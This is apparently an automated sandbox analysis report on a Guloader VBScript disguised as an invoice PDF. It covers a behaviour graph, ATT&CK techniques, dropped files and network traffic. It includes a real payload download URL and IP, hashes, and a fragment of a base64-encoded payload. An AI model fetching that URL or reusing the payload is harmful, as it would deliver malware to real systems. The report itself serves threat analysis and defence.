          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information22
          Scripting          		Valid Accounts1
          Windows Management Instrumentation          		22
          Scripting          		11
          Process Injection          		1
          Masquerading          		OS Credential Dumping1
          Security Software Discovery          		Remote Services1
          Archive Collected Data          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts11
          Command and Scripting Interpreter          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		21
          Virtualization/Sandbox Evasion          		LSASS Memory1
          Process Discovery          		Remote Desktop ProtocolData from Removable Media1
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          Exploitation for Client Execution          		Logon Script (Windows)Logon Script (Windows)11
          Process Injection          		Security Account Manager21
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts2
          PowerShell          		Login HookLogin Hook2
          Obfuscated Files or Information          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput Capture12
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Software Packing          		LSA Secrets1
          Remote System Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading          		Cached Domain Credentials1
          System Network Configuration Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
          File and Directory Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem14
          System Information Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1428858 Sample: INVOICE pdf.wsf Startdate: 19/04/2024 Architecture: WINDOWS Score: 100 37 originalconceptsinc.ru.com 2->37 43 Malicious sample detected (through community Yara rule) 2->43 45 Antivirus detection for URL or domain 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 2 other signatures 2->49 9 wscript.exe 1 2->9         started        signatures3 process4 signatures5 53 VBScript performs obfuscated calls to suspicious functions 9->53 55 Suspicious powershell command line found 9->55 57 Wscript starts Powershell (via cmd or directly) 9->57 59 5 other signatures 9->59 12 powershell.exe 14 19 9->12         started        16 PING.EXE 1 9->16         started        18 cmd.exe 1 9->18         started        20 PING.EXE 1 9->20         started        process6 dnsIp7 39 originalconceptsinc.ru.com 216.10.249.248, 49730, 80 PUBLIC-DOMAIN-REGISTRYUS India 12->39 61 Suspicious powershell command line found 12->61 63 Very long command line found 12->63 65 Found suspicious powershell code related to unpacking or dynamic code loading 12->65 22 powershell.exe 17 12->22         started        25 conhost.exe 12->25         started        27 cmd.exe 1 12->27         started        41 127.0.0.1 unknown unknown 16->41 29 conhost.exe 16->29         started        31 conhost.exe 18->31         started        33 conhost.exe 20->33         started        signatures8 process9 signatures10 51 Found suspicious powershell code related to unpacking or dynamic code loading 22->51 35 cmd.exe 1 22->35         started        process11

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          INVOICE pdf.wsf16%ReversingLabsScript-JS.Trojan.Guloader

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
          http://crl.microsoft0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          http://www.microsoft.0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          originalconceptsinc.ru.com
          		216.10.249.248
          		truefalse
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://originalconceptsinc.ru.com/asdt/Kardinaliteter.pfbfalse
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.4185249372.000002449A046000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.4098203498.0000000005C7E000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://originalconceptsinc.ru.com/asdt/Kardinaliteter.pfbXRpowershell.exe, 0000000A.00000002.4087319648.0000000004D68000.00000004.00000800.00020000.00000000.sdmpfalse
                  		unknown
                  http://originalconceptsinc.ru.compowershell.exe, 00000007.00000002.4087877267.000002448B88B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4087877267.000002448A404000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4087877267.000002448BD8D000.00000004.00000800.00020000.00000000.sdmpfalse
                    		unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.4087319648.0000000004D68000.00000004.00000800.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    https://aka.ms/pscore6lBpowershell.exe, 0000000A.00000002.4087319648.0000000004C11000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://crl.microsoftpowershell.exe, 0000000A.00000002.4109661918.0000000007669000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.4087319648.0000000004D68000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://go.micropowershell.exe, 00000007.00000002.4087877267.000002448B1AA000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/powershell.exe, 0000000A.00000002.4098203498.0000000005C7E000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.4185249372.000002449A046000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.4098203498.0000000005C7E000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://contoso.com/Licensepowershell.exe, 0000000A.00000002.4098203498.0000000005C7E000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://contoso.com/Iconpowershell.exe, 0000000A.00000002.4098203498.0000000005C7E000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://originalconceptsinc.ru.com/asdt/Kardinaliteter.pfbPpowershell.exe, 00000007.00000002.4087877267.000002448A1F7000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            http://www.microsoft.powershell.exe, 0000000A.00000002.4109661918.000000000771E000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://aka.ms/pscore68powershell.exe, 00000007.00000002.4087877267.0000024489FD1000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.4087877267.0000024489FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.4087319648.0000000004C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.4087319648.0000000004D68000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  216.10.249.248
                                  		originalconceptsinc.ru.comIndia
                                  		394695PUBLIC-DOMAIN-REGISTRYUSfalse

                                  Private

                                  IP
                                  127.0.0.1

                                  General Information

                                  Joe Sandbox version:40.0.0 Tourmaline
                                  Analysis ID:1428858
                                  Start date and time:2024-04-19 18:15:06 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 8m 42s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:16
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:INVOICE pdf.wsf
                                  Detection:MAL
                                  Classification:mal100.troj.expl.evad.winWSF@19/6@1/2
                                  EGA Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 98%
                                  • Number of executed functions: 48
                                  • Number of non-executed functions: 16
                                  Cookbook Comments:
                                  • Found application associated with file extension: .wsf
                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target powershell.exe, PID 7732 because it is empty
                                  • Execution Graph export aborted for target powershell.exe, PID 7984 because it is empty
                                  • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: INVOICE pdf.wsf

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  18:15:56API Interceptor111x Sleep call for process: powershell.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  No context

                                  Domains

                                  No context

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  PUBLIC-DOMAIN-REGISTRYUSHmGUCvTQIacWu7Q.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.91.199.224
                                  Payment.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                  • 208.91.199.224
                                  Gcerti Quote.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.91.199.224
                                  Syknivkloo.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.91.199.224
                                  F723838674.vbsGet hashmaliciousRemcosBrowse
                                  • 116.206.104.215
                                  CTM REQUEST BIRTHSHIP.docGet hashmaliciousAgentTeslaBrowse
                                  • 208.91.199.224
                                  PURCHASE ORDER -HDPESD.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.91.199.224
                                  order 4500381478001.exeGet hashmaliciousAgentTeslaBrowse
                                  • 162.215.248.214
                                  Bill-Transcript_6ZB6-IJYD3B-SEH0.htmlGet hashmaliciousUnknownBrowse
                                  • 45.113.122.212
                                  rks18.docGet hashmaliciousAgentTeslaBrowse
                                  • 208.91.199.224

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:modified
                                  Size (bytes):11608
                                  Entropy (8bit):4.886255615007755
                                  Encrypted:false
                                  SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                                  MD5:C7F7A26360E678A83AFAB85054B538EA
                                  SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                                  SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                                  SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ajpopih2.xll.ps1

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_llbsdq4o.vv3.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pd5wkpoa.2hz.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pedo13lo.ski.psm1

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Roaming\Benzidine233.Sjl

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                  Category:dropped
                                  Size (bytes):435220
                                  Entropy (8bit):5.972804516426518
                                  Encrypted:false
                                  SSDEEP:6144:QroTcEuFOIUHsDTpcrtNV6i9v7GZS2lAg7NlKWbi7Fz1tMrXqZyxBO9da9QJnGUI:QrowafwAb2lAg7THmR7GXuW9Q3I
                                  MD5:65A4520546D82D6E7540070D1D37C6F2
                                  SHA1:0127DE240377CC528273091A7F80D70B8FA53049
                                  SHA-256:7C491432504B8FAD24A4CCAD141EFC791C56C8DE3D1C3175E7B2923FD21B9971
                                  SHA-512:E40962871AE3970F0639FBAA07191A2D51C8686A2018C819DCEA4CE1D163865604A4F3FE78726B8CAC4E14C0843316DC27C0AF6726A0A00175381A2ACAC4EFE4
                                  Malicious:false
                                  Preview:cQGbcQGbu32IEwDrAjQw6wJtfQNcJATrAiPF6wKxu7nS0lMKcQGb6wL4sIHxMPLfvXEBm3EBm4HBHt9zSHEBm+sCJ8FxAZvrAi4ouvyPeO1xAZvrAmmocQGb6wLBgzHK6wKhIusC/XCJFAtxAZtxAZvR4nEBm3EBm4PBBHEBm+sCjUKB+UN6dgJ8zOsCXG9xAZuLRCQE6wKE2esC22eJw+sCnk/rArligcOciTgBcQGb6wIuDrqGE0ch6wJ5R+sC/MOB8mZn5E3rApEGcQGbgfLgdKNscQGbcQGbcQGb6wKCxnEBm+sCEt+LDBBxAZvrAss1iQwT6wISG3EBm0LrAhKPcQGbgfqshQQAddXrAh1b6wJNHYlcJAzrAvdq6wKgMYHtAAMAAOsCfNnrAgTDi1QkCHEBm3EBm4t8JATrAmtScQGbietxAZtxAZuBw5wAAABxAZtxAZtTcQGbcQGbakDrAo0hcQGbietxAZtxAZvHgwABAAAAEI0C6wISs3EBm4HDAAEAAHEBm+sCr5lTcQGbcQGbievrAiDL6wKaS4m7BAEAAHEBm3EBm4HDBAEAAOsCnsHrAtY+U+sCYa1xAZtq/3EBm3EBm4PCBXEBm3EBmzH2cQGb6wLgdTHJ6wIQ5XEBm4sacQGb6wKUtEHrAiLwcQGbORwKdfPrAgRa6wKqO0brArtqcQGbgHwK+7h13HEBm3EBm4tECvxxAZvrAlEmKfDrAjONcQGb/9JxAZtxAZu6rIUEAHEBm3EBmzHAcQGb6wLCbIt8JAzrAu/HcQGbgTQHSl3Q9+sCMNRxAZuDwATrAiXZ6wLqzjnQdeNxAZtxAZuJ++sCxadxAZv/1+sCraXrAvmnw7hRG3veI/PLmeF3uVmFfq/kPj8tXlEGcxaGkMucc7o1VVE21HOfZONY1GplO1UvjRnd98ZcwRDPnlGDR114SgeuUYNHXRODpv7pNCzYAHYOUNDufRKYc5qaVe5IXdDtCrw5dv9E

                                  Static File Info

                                  General

                                  File type:XML 1.0 document, ASCII text, with very long lines (1969), with CRLF line terminators
                                  Entropy (8bit):5.133093479073143
                                  TrID:
                                  • Generic XML (ASCII) (5005/1) 50.01%
                                  • Synchronized Multimedia Integration Language (5002/2) 49.99%
                                  File name:INVOICE pdf.wsf
                                  File size:230'709 bytes
                                  MD5:62a9fb211e083aefa46e2a82cbef11bc
                                  SHA1:f1e75cf66bbaf1ea3535bfe188f11d08dac775c8
                                  SHA256:7bf66677d4f93167a77e217bcf72899ffdbcd62cb79688fa7e7346ac91a14678
                                  SHA512:65295e73290a6357ef4dbaf2d882880101ae97fe2a6b1d7835437e9b0a3339eeb70fc6a762b58b22e9d5a9699419a2816f9d2319a2e692900dcc69687794a86a
                                  SSDEEP:6144:rWEeg2kae621pGqbWt0JPvk+r+usYBbnPZnqtFVyNLFViFHV/O3CLfItE0Pux:nWqv6uVKUux
                                  TLSH:AB3419E0CFCA26399F4B3ED9AD64444289F88195011228BDE6D907EDB243D6CD3FED58
                                  File Content Preview:<?xml version="1.0" ?>..<job id="@JOB_ID@">..<script ..language="VBScript">..' <![CDATA[....Rem sjoverens sowel?..Rem baarings udarbejdedes,..Rem Perikumbrndevin nyttiggrelserne aggravation: multivalency..Rem Homeriskes? occipitoaxial: amoebicidal150..

                                  File Icon

                                  Icon Hash:68d69b8f86ab9a86

                                  Static OLE Info

                                  General

                                  Document Type:Text
                                  Number of OLE Files:1

                                  OLE File "INVOICE pdf.wsf"

                                  Indicators
                                  Has Summary Info:
                                  Application Name:
                                  Encrypted Document:False
                                  Contains Word Document Stream:False
                                  Contains Workbook/Book Stream:False
                                  Contains PowerPoint Document Stream:False
                                  Contains Visio Document Stream:False
                                  Contains ObjectPool Stream:False
                                  Flash Objects Count:0
                                  Contains VBA Macros:True

                                  Network Behavior

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Apr 19, 2024 18:15:57.708441019 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:15:58.215898991 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:15:58.216070890 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:15:58.216409922 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:15:58.724571943 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:15:58.826647043 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:15:58.826711893 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:15:58.826750994 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:15:58.826791048 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:15:58.826803923 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:15:58.826829910 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:15:58.826854944 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:15:58.826869965 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:15:58.826910973 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:15:58.826932907 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:15:58.826950073 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:15:58.826987028 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:15:58.827011108 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:15:58.827029943 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:15:58.827089071 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:15:59.335171938 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:15:59.335237026 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:15:59.335278988 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:15:59.335319042 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:15:59.335360050 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:15:59.335398912 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:15:59.335421085 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:15:59.335421085 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:15:59.335438967 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:15:59.335481882 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:15:59.335494041 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:15:59.335522890 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:15:59.335544109 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:15:59.335562944 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:15:59.335603952 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:15:59.335643053 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:15:59.335650921 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:15:59.335685015 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:15:59.335704088 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:15:59.335724115 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:15:59.335762024 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:15:59.335777998 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:15:59.335802078 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:15:59.335839987 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:15:59.335860968 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:15:59.335877895 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:15:59.335917950 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:15:59.335938931 CEST4973080192.168.2.4216.10.249.248
